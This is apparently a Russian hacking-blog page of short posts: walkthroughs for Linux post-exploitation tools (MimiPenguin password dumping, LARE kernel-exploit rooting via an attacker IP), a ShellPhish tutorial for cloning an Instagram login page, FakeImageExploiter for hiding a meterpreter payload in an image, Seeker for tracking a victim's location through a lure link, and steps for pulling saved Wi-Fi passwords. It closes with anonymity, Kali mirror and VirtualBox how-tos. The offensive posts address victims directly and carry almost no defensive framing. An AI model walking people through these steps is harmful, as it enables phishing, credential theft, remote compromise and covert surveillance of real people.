перечисление всего что есть в системе Основной задачей данного скрипта является функция перечисления (англ. Enumeration). Он вытаскивает всю доступную информацию о системе. Данный скрипт создан, если не сказать, что создан для лентяев то для тех, кто ценит свое время. Для запуска он не требует прав root’а, работает в стандартном терминале. # wget https://raw.githubus...ster/PXEnume.sh Установка: # git clone https://github.com/s...uong/PXEnum.git # cd PXEnum/ # chmod +x PXEnum.sh # bash PXEnum.sh 2. MIDA Multitool — палим систему по взрослому Другой интересный инструмент MIDA Multitool созданный на базе менее именитых собратьев SysEnum и RootHelper, но включающий в себя гораздо больший функционал. По воле разработчика функционал MIDA Multitool включает в себя отдельные функции своих предшественников под одним капотом, а именно: SysEnum — Bash скрипт, предназначенный для получения основной информацию о системе, включая, но не ограничиваясь следующими данными — текущий пользователь, IP-конфигурация, таблицы ARP, запущенные процессы и т.д. Roothelper — призван помочь в процессе эскалации привилегий в системе, которая была скомпрометирована, путем выполнения ряда перечислений и использования доверительных сценариев. Устанавливаем скрипт в систему с github: # git clone https://github.com/N...h-Kit-Multitool # cd Bash-Kit-Multitool # chmod +x bashkit.sh Запускаем скрипт: # /.bashkit.sh Дело сделано! Можно запускать в системе! 3. MimiPenguin — тырим пароли без зазрения совести Очень хорошо известный скрипт в узких кругах пен-тестеров под названием MimiPenguin. основной задачей утилиты служит сброса пароля на вход в систему от текущего пользователя Linux. Если такое сравнение возможно то это аналог утилиты mimikatz для дампа пароля в Windows системах (о ней мы уже рассказывали в одной из наших прошлых статей) Кроме того, MimiPenguin поддерживает такие приложения, как VSFTPd (активные подключения клиента FTP), популярнейший web-сервер Apache2 (активные/старые сеансы HTTP BASIC AUTH, но для этого требуется Gcore) и openssh-сервер (активные подключения SSH с использованием команды sudo). И вообще необходимо сказать, что MimiPenguin часто становится частью эксплойтов под Linux. Устанавливаем MimiPenguin забирая его с репозитория GitHub: # git clone https://github.com/h...gal/mimipenguin # cd mimipenguin # ls –a # chmod +x mimipenguin.sh # ./mimipenguin.sh 4. LARE — ломимся под рута используя баги ядра И напоследок еще один довольно простой скрипт, который помогает с помощью использования известных уязвимостей в ядре ОС получать привилегии root удаленно с атакующей машины. Скрипт использует локальные эксплойты для получения root прав для версий ядра Linux Kernel v2.6-v4.8. Кстати, эта тулза очень часто находит свое применение на пиздатом сертификационном экзамене OSCP. Устанавливаем скрипт в систему: # git clone https://github.com/EnigmaDimitri/LARE && cd LARE # chmod +x LARA.sh # LARE.sh -a Запуск скрипта на целевой машине в сети # LARE.sh -l [Attackers-IP] Запуск на машине с подключением к базе данных эксплойтов на GitHub # LARE.sh -l or ./LARE.sh -l Проверка и защита системы от техник пост-эксплуатации Для обеспечения безопасности системы на предмет пост-эксплуатации, по мимо традиционных вариантов защиты как то установка патчей (security patch) и минимизация привилегий, дополнительно существуют специальные тулзы для проверки системы. Ведь в противовес неправильно сложившегося мнения, к пост-эксплуатации не обязательно ведут только 0-dayили устаревший софт,
-
- инстурмент
- метод
- (and 11 more)
-
Всем привет, сейчас я вам хочу рассказать о том, как же можно очень быстро создать фишинговый сайт. Кто незнаком с этим понятием – то прошу ознакомиться, а если говорить проще, то это поддельный сайт. Итак, для работы на понадобится операционная система Kali Linux, после чего надо открыть ее консоль и ввести данную команду: git clone https://github.com/thelinuxchoice/shellphish Отлично, теперь здесь нам надо прописать данные команды: cd shellphish bash shellphish.sh Теперь из предложенных вариантов фишинговых сайтов мы должны выбрать нам необходимый. В качестве примера мною будет выбран фишинговый сайт для Инстаграм. Нам на выбор будет предоставлено несколько способов, я же выберу способ под номером 01, после чего нам нужно будет прописать порт, в случае его отсутствия – пропустить его ввод. Итак, мы видим данную ссылку, нам необходимо ее скопировать и вставить в адресную строку. Как вы видите, фейковая страничка была успешно создана, переходя по которой жертва введет свои данные для входа в аккаунт. После этого жертву перекидывает на официальный сайт инстаграм, если че пользователь уже был авторизован, то сразу же будет открыта его страничка в соц. сети. В то время как жертва отправляем нам свои данные, мы их получаем прямо в консоли, где мы может узнать IP, местонахождение и так далее. А вот после непосредственного нажатия кнопки входа мы получим данные вида: логин и пароль. Как вы видите это занимает кране много времени, но это не меняет того, что данный метод взлома страничек является очень эффективным.
-
Приветствую всех, сейчас я собираюсь рассказать вам о таком инструменте, как FakeImageExploiter, который позволит вам заполучить доступ к чужому компьютеру на расстоянии, благодаря внедрения полезной нагрузки прямо в картинку. Для работы инструмента, нужно лишь исходное изображение и конечно же payload после чего он создают полезную нагрузку, а это значит, что после открытия ее, будет запущенно оба файла, который мы указали, а именно необходимая нам программа и картинку. Инструмент меняет иконку ярлыка, что быть похожим на картинку, после чего используя hide, чтобы скрыть ненужные нам расширения файла. Использование: Местом хранения всех файлов в данном инструменте является – apache2, образуя новый архив, после чего запускает данный файл, а также обработчик, выдавая адрес, который будет отправлен необходимому устройству. Когда человек откроет файл, будет как обычно открыта картинка, а на ее фоне будут загружены вредоносные данные, после чего нам будет доступа активная сессия meterpreter. Если же вы собираетесь использовать другое направление атак, то инструмент создаст агент также в FakeImageExploiter/output, при том, если мы собираемся отослать agent.jpg.exe. Также вместе с этим будет создан файл – cleaner.rc, который вы будете использовать для того, чтобы удалять созданные полезные нагрузки. Лучшие провести миграцию в отдельный процесс, перед тем как использовать данный файл. Данный инструмент можно установить на многие операционные системы типа UNIX Зависимости: Xterm, zenity, apache2, mingw32, ResourceHackerУстановка последнего в /wine/Program Files/ Установка: git clone https://github/root-3xp10it/FakeImageExploiter cd FakeImageExploiter chmod +x FakeNameExploiter.sh Запуск ./FakeImageExploiter Действия, которые нам нужно сделать перед запуском: Первым делом нам нужно создать полезную нагрузку.После чего нам нужно выбрать необходимую картинку.Теперь нам нужно будет соединить данные файлы в единый архив. Поэтому стартуем FakeImageExploiter ./FakeImageExploiter.sh Теперь нажимаем окей. Чтобы инструмент работал нормально и без перебоев, нам будет необходимо установить ResourceHacker, конечно, если до этого не был установлен, то данный инструмент установит его самостоятельно. Как только вы закончите с этим, вам нужно будет запустить фреймворк. Отлично, теперь мы увидим запуск нужных для работы сервисов, для начала работы нам нужно будет выбрать картинку, а потом и полезную нагрузку. Хочу отметить то, что если вы хотите использовать данную нагрузка в формате .exe, то заходим в settings и меняем в параметре PAYLOAD_EXTENSION ps1 на exe. Далее вам будет предоставлено множество подсказок, поэтому сложностей с дальнейшими действиями не будет.
-
Всем привет, хочу обсудить тему анонимных операционных систем, ведь зачастую пользователи считают, что после установки такой ОС, они становятся неуязвимыми. Однако, как вы возможно уже догадались, это суждение является неверным. Скажу больше, оно может стать крайне отрицательным для таких пользователей. Ведь операционная система является лишь инструментом, которым управляете именно вы. Помните, что лучший способ обезопасить себя – это думать собственной головой. Поэтому рассмотрим, что не стоит делать при работе с ОС. 1.Не изменяйте настройки внутри системы, особенно если ты плохо в этом разбираешься. Если вы решили поковыряться в настройках, не имея при этом знаний, то это будет явно не лучшей затеей. Не пытайтесь изменить прокси, авось все будет работать как прежде. Конечно, скорее всего все будет работать, но в случае изменения ты можешь потерять защиту и спалить свой настоящий ИП. Не включайте в TAILS впн не пойми от кого. Если она не поддерживает впн, то это не со зла и не от недобросовестности программистов. А для того, чтобы обезопасить тебя, ведь часто такие впн только ослабят вашу анонимность. 2. Не открывайте входные двери, если вы имеете в распоряжении анонимную ОС. Никаких проверок почты, счетчиков и никаких сходить за сигаретами. Если вы сидите в анонимной системе, то сидите и делайте то, что вам нужно. Если же ты хочешь открыть входную дверь, даже на пару секунд, то тогда вырубай все это дело, прячь и только после этого открывай. По-другому никак, но почему? Все легко. Например вы можете находится под наблюдением у тех, кому необходимы ваши данные. Они прекрасно понимают, что он под шифром. Конечно, они могут ворваться к тебе и сломать тебе пару костей, чтобы ты сказал ключи. Однако для этого понадобится время, за которое вашу пропажу из сети успеют спохватиться ваши соучастники. Но самым простым способом получить зашифрованные данные, это дождаться того момента, когда человек откроет ту самую дверь, с этим наверное справится даже ребенок. 3. Не посещайте сайты, которые не предназначены для работы. Социальные сети, ютуб и прочее сразу же отбрасываем. Тут есть небольшая закономерность, чем больше таких сайтов посетил – тем больше наследил. Поэтому пользуемся только сайтами для работы. Все остальное отсеиваем и делаем на другой операционной системе, где мы эти не занимаемся. 4. Не скачивай файлы и не переноси с других носителей. Если ты пользуешься анонимной операционкой, то абсолютно не желательно что-то скачивать на нее или переносить с флешек. Ведь с данной информацией приходят и проблемы. Конечно, операционка все это забудет, даже вредоносный софт, однако забудет только после ребута. Поэтому если вы стартанете вирус, то он будет работать на протяжении того времени, сколько работали и вы. Но, если все же вам очень нужно перенести информацию, то выполняем следующие пункты: 1.Производим установку пакетов: rkhunter, chkrootkit, clamtk 2. Прозводим обновление базы clamtk 3. Выполняем переноси информации 4. Отключаем компьютер от интернета, я имею ввиду, что нам нужно отключить провод от роутера или от самого устройства. 5. Производим запуск или чтение информации. 6. После чего проверяем всю систему тремя вышеуказанными программами 5. Не используйте свои коронные фразы Наверняка у вас есть какие-то собственные фразы, которые вы часто употребляете сидя на форумах. Если же вы работает в анонимной операционке, то я рекомендую воздержаться от их использования. Ведь это будет являться кросспостингом, с помощью него раскрывают анонимность пользователя в торе. Складывается среднее количество символов, знаков препинания, ошибок, ключевых слов и многое другое. Когда вся эта информация соберется, будет составлен сетевой портрет, после чего по нему начинается поиск в социальных сетях, форумах и так далее. Как показывает практика, практически всегда находят того, кто пытается скрыться.
-
- рекомендации
- операционная система
- (and 9 more)
-
Приветствую всех хакеров, пентестеров и других пользователь Кали Линукс, сейчас я бы хотел рассмотреть тему медленного обновления данной операционной системы. Многие кто пользуется ей, наверняка, задают себе очень частый вопрос. А почему же имея даже великолепную скорость интернета, скорость обновления оставляет желать лучшего. Итак, начнем исправлять эту плачевную ситуацию. Для начала вам будет необходимо сменить перечень репозиториев в файле sourcle.list на Kali Linux Mirror, который является быстрее привычной нам версии. Чтобы найти все зеркала, то вы можете обратиться на сайт - http.kali.org/README.mirrorlist Вы будете должны изменить свой перечень в файле sourcle.list, найти вы его сможете вписав эту команду: Sudo gedit etc/apt/sources.list Далее переходим на тот самый сайт и выбирайте то зеркало, у которого вы увидите минимальное кол-во ответов Prio. Далее нам нужно будет изменить ссылку, которая относится к выбранному нами зеркалу. Например, выберем этот адрес – http://mirrors.dotsrc.org/kali/README Чтобы продолжить, нам нужно будет удалить из ссылки лишние символы. То есть у нас должно получиться вот так - http://mirrors.dotsrc.org/kali/ Если вы имеете желание, то после некоторых проверок вы можете использовать и протокол https. Теперь как вы могли догадаться, вам необходим открыть source.list и заменить старый адрес на тот, который вы вбрали с данного сайта. Если вы выполнили все пункты, а самое главное выполнили правильно, то после этого адреса должны измениться на новые. Далее вы можете изменить DNS адрес, обычно те, которые стоят по умолчанию имеют сомнительные скорости. Поэтому вы можете поменять их на более быстрые, например, от Гугл. Поэтому обязательно смените DNS адрес и опять сохраните файл. А теперь последний пункт, но не менее важный – это преждевременная очистка кэша apt, чтобы запустить очистку вам нужно написать данную команду – apt clean. Все, все пункты выполнены, поэтому вы можете приступать к обновлениям вашей операционной системы. Если вдруг вы забыли, то я вам напомню, что происходит это с помощью данной команды: sudo apt-get update && apt-get upgrade Поверьте, после того как выполните все данные действия, вы сразу же сможете заметить, что скорость обновления значительно возросла, что не может не радовать. Ведь часто такие обновления могут занимать достаточно большое количество времени.
-
- исправление
- работа
- (and 12 more)
-
Всем снова привет! В этой статье я бы хотел опять затронуть тему слежки за людьми. Хочу сразу предупредить, что данная статья написана лишь в ознакомительных целях, чтобы каждый пользователь смог защититься от этого. Я не призываю никого этим заниматься. Ладно не будем медлить, ведь не каждый день удается узнать о способе слежки, которая показывает информацию о местонахождении с погрешностью всего ~30 метров. Необходимые инструменты для работы: Kali LinuxSeekerМожно было бы пойти по порядку, если бы список не был таким коротким. Ведь я уверен, что вы все знаете о том, что такое Kali Linux. Поэтому перейдем сразу ко второму пункту. Seeker является скриптом для вышеуказанной операционной системой, который собственно и занимается вычислением местонахождения человека. Это возможно после нажатия жертвой специально созданной ссылке, также скрипт использует в себе ngrok. Данные скрипт использует для работы сразу несколько языков программирования, которые помогают ему заполучить информацию об каком-либо пользователе благодаря функции геолокации с невероятной точностью данных. Напомню, что точность имеет погрешность всего лишь до 30 метров, это колоссальный результат. Как же работает данный скрипт? Он создает фейковый сайт и использует при этом ngrok, которая попросит у пользователя разрешение на размещение, если пользователь соглашается с этим, то после этого вы сможете получать вот такую информацию о нем: ДолготаШиротаТочностьВысота (однако может работать не всегда)Направление (работает только тогда, когда пользователь находится в движении)Скорость (тоже работает только тогда, когда пользователь находится в движении) Также кроме информации о местонахождении человека, вы также сможете получить аппаратную информацию, не имея при этом никаких дополнительных разрешений с его стороны. А именно: ОСПлатформаКол-во ядер CPUОбъем RAMРазрешение экранаИнформацию о видеокартеНазвание и версия браузераIP адрес Установка: Первым делом, как неудивительно, нам нужно будет открыть терминал кали. После этого в него вам нужно будет написать данную команду: git cole https:/github.com/thewhiteh4t/seeker.git cd seeker/ chmod 777 install.sh ./install.sh seeker После этого нам необходимо всего-то запустить его, сделать это можно с помощью данной небольшой команды: - python seeker.py Теперь единственно что вам нужно – это ждать, пока человек нажмет на сгенерированную вами ссылку и соответственно даст разрешение на геолокацию После этого вы сразу же получи данные о его местонахождении, а также о его устройстве. Использовать данные геолокации можно в том же Google Maps.
-
- слежка
- местоположение
-
(and 10 more)
Tagged with:
-
Если вдруг произошло так, что вы забыли пароль от вашей сети, к который вы когда-то подключали свой компьютер или же вы хотите знать, к каким же сетям подключался компьютер некоторое время назад и какие при это были использованы пароли, то я предлагаю вам к прочтению эту статью. Эта информация поможет вам только в том случае, если вы имеет прямой доступ к компьютеру. И нет никакой разницы включен он или нет и какая на нем стоит операционная система. Если вы сюда пришли, чтобы узнать к каким точкам доступа был когда-то подключен компьютер, если вы не имеете прямого доступа, то вам могут немного пригодится утилиты Airodump-ng и iSnuff-GPS. Вычисление паролей от WiFi Если вам необходимо выяснить пароль той точке, к которой подключено ваше устройство прямо сейчас, то это возможно выполнить прямо с операционной системы. Итак, нужно зайти в “Центр управления сетями и общим доступом”, там нажмите на название точик. В новом окне тыкните “Свойства беспроводной сети”. В этом окне вам следует зайти в пункт “Безопасность” и напротив пункта “Отображать вводимые знаки” вы должны поставить галочку. Если вам нужно выяснить, к каким беспроводным точкам доступа компьютер подключался когда-либо, то можно воспользоваться для этого двумя методами. Первый заключается в использовании командной строки ОС, а второй в использовании специального ПО. Открываем командную строку (Win + R после чего пишем “cmd”) Чтобы увидеть список профилей, вам будет необходимо написать эту команду: netsh wlan show profile Для получения списка паролей для всех доступных сетей, пишем команду: Netsh wlan show profile name=* key=clear А если вы хотите узнать пароль определенной точки доступа, то пишем эту команду: Netsh wlan show profile name=”название_сети” key=clear Вторым же методом является программа, имеющая свой граф. интерфейс, который позволит вам узнать использование прошлых сетей и называется она WirelessKeyView. За использование утилиты платы не взымается. Чтобы получить необходимые данные, нужно всего лишь ее запустить. Вам сразу же будет выведет список с точками доступами и паролями. Как получить пароли у неработающего компьютера Рассмотрим пример на Windows XP, где пароли от сетей находятся в реестре HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WZCSVC\Parameters\Interfaces\[interface Guid]. Эти файлы имеют хорошее шифрование, поэтому через обычный просмотр реестра вы их не увидите. Однако, вышеуказанная программа способна вытаскивать пароли даже из компьютеров, не находящихся в сети, более того, она может достать пароли с тех систем, которые уже не могут запуститься. Чтобы это сделать вам нужно зайти в продвинутые опции программы и задать директорию для необходимой информации. Что хочется сказать на счет XP, как только вы введете пароль для точки доступа, он сразу же переводит его в 256-битный ключ. Как раз-таки этот ключ нам и скажет наша утилита, но, перевести этот ключ в необходимые нам символы не может. Но все хорошо, этот огромный ключ также можно использовать для получения доступа к сети. В более высоких версиях Windows никакого перевода не происходит, поэтому утилита показывает сразу оригинальные пароли. Также в следующих версиях этой операционной системы, пароли от точек доступа находятся по адресу c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\[interface Guid]. Нахожденией паролей от точек доступа в Linux Чтобы произвести подключение к точке доступа, Linux обращается к Network Manager. Данная утилита обладает собственным графическим интерфейсом. Она сохраняет все свои опции связанные с подключениями в незакрытых местах. Однако, первым делом стоит взаимодействовать с этим всем графическим интерфейсом и выяснить, к каким точкам компьютер когда-либо подключался. Для этого нажимаете на вашу иконку WiFi и далее тыкаете “Сетевые соединения”. Там будет показана вся информация о подключениях. Если вам нужно узнать пароль, то нажимаем на необходимую нам сету и после тыкаете “Изменит”. Там выбираете пункт “Защита WiFi” и на против надписи “Показывать пароль” ставите галочку. Заметьте, что для выполнениях этих действий, у нас не потребовали даже пароль администратора, а это значит, что узнать эту информацию может любой пользователь. Я уже упоминал о том, что все опции сохраняются в открытом виде, а именно по этому пути /etc/NetworkManager/system-connections/. Для того, чтобы увидеть, что же там находится, вводим команду: ls –l /etc/NetworkManager/system-connections/ Для того, чтобы получить названия точек и их пароли, набираем команду: sudo egrep –h –s –a 9 –color --T ‘ssid=’ /etc/NetworkManager/system-connections/* Как получить пароли от неработающего Linux Чтобы получить пароли с компьютером под данной операционной системы, то вы можете загрузить Live систему или же подсоединить жесткий диск компьютера этой системы к другой. Если вы исследуете данную операционную систему, то вам необходимо всего на всего смонтировать систему файлов вашего накопителя и исследовать те файлы, о которых шла речь выше.
-
В данной статье мы на практике рассмотрим, как установить и запустить виртуальную машину с дистрибутивом Linux, а именно – Kali Linux. Данная операционная система была выбрана по причине того, что она является стандартным дистрибутивом, с которым должен ознакомиться каждый хакер, не смотря на то, чем он занимается. Сперва нам нужно выбрать ПО, которое поможет нам поставить виртуальную машину и в будущем запустить ее. Самые популярные для этого Virtual Box и VMware. Скажу сразу, что во 2 варианте существует два продукта, первый платный, второй собственно бесплатный, у которого есть ограничения в функционале. Мы же буем рассматривать на примере Virtual Box. 1.Установка виртуальной машины Первым делом, нам нужно сказать, а после чего установить ПО с официального сайта. После того как скачивание было завершено – устанавливаем. Никаких трудностей это не составляет. 2. Поиск образа Когда виртуальная машина установлена, вам нужно найти образ ОС, которые потребуется для установки. Однако существует и другой вариант – это скачивание готовой ВМ, которую можно будет импортировать. На официальном сайте Kali Linux вы сможете найти раздел с образами операционной системы, а также готовые машины для двух вышеупомянутых программ. Если вы скачиваете готовую ВМ, то вы скачаете файл формата .ova который является запакованной виртуальной машиной, которую нужно будет всего лишь импортировать в выбранную программу.Если вы скачиваете образ диска, то вы скачаете файл формата .iso который является вымышленным диском, с которого вы и будете производить установку операционной системы как на компьютере.Как первый так и второй вариант имеет свои преимущества и недостатки, главными преимуществами импортирования ВМ является высокая скорость выполнения данного действия. С диска же установка может длится и по тридцать минут. Но довольно часто готовые виртуальные машины требуется длительно обновлять, так как создают они не так часто, а вот обновлениями радуют довольно много, ко все прочему вы не сможете контролировать некоторые параметры при установке. 3. Добавление ВМ с помощью импорта образа. После того, как вы скачаете ВМ, вам нужно будет произвести импорт в VirtualBox. Для этого нажимаете “Файл”, затем “Импорт конфигураций”, дальше ищем образ нашей виртуалки. После чего жмем “Далее” и нам откроется окно. В открывшемся окне будет написана вся конфигурация виртуалки, после импорта вы сможете изменить большую часть настроек, но рекомендую менять путь хранения сразу, так как по умолчанию он установится на диск C. Будет куда лучше разбивать диски под информацию и под виртуальные машины. Также, здесь вы сможете поменять кол-во оперативной памяти и количество используемых ядер. Выделяйте не меньше двух гигобайт, и если есть возможность – два ядра. После того как настройка будет закончена, тыкайте на кнопку “Импорт” и ожидайте завершения. Иногда при импортировании Kali Linux появлялась проблема. Происходила ошибка, которая касалась USB контроллера. Если у вас появилась такая ошибка, то попробуйте отключить USB в настройках ВМ, если способ не поможет, то поищите информацию по этому поводу в интернете. 4. Установка виртуальный машины с образа диска После того, как вы скачаете образ диска с дистрибутивом вам будет нужно создать новую ВМ и произвести запуск с этого диска. Тыкаем “Создать”, после чего появляется окно, в котором мы выбираем тип операционной системы, в нашем случае Linux, дальше версию и ввести имя. В окне настройки выбираем кол-во RAM памяти, опять же, рекомендую не менее 2 гигабайт.Если создаете новую виртуальную машину, то в следующем окне выбирайте “Создать новый виртуальный жесткий диск”.Далее рекомендую выбирать как тип вашего жесткого диска – VMDK, так как совместим со всем другим ПО.В следующем окне выбирайте формат диска, рекомендую ставить динамический, так как иногда бывает не ясно, сколько нужно будет установить программ.После этого появится окно с вводом имени диска, расположение и начальным объемом.После всех этих действий ВМ будет создана Дальше нам нужно будет добавить виртуальный привод. Тыкаем на кнопку “Носители”, далее “контроллер IDE”, дальше справа выбираем “Оптический привод” ищем диск и включаем функцию “Выбрать образ оптического диска” после этого находим образ нашей операционной системы. Когда вы выполните все вышеуказанные действия вы можете запустит виртуальную машину, нажатием кнопки “Запуск”. После этого начнется непосредственная установка операционной системы, нужно будет лишь следовать указанным пунктам.
-
- виртуалка
- шифрование
- (and 12 more)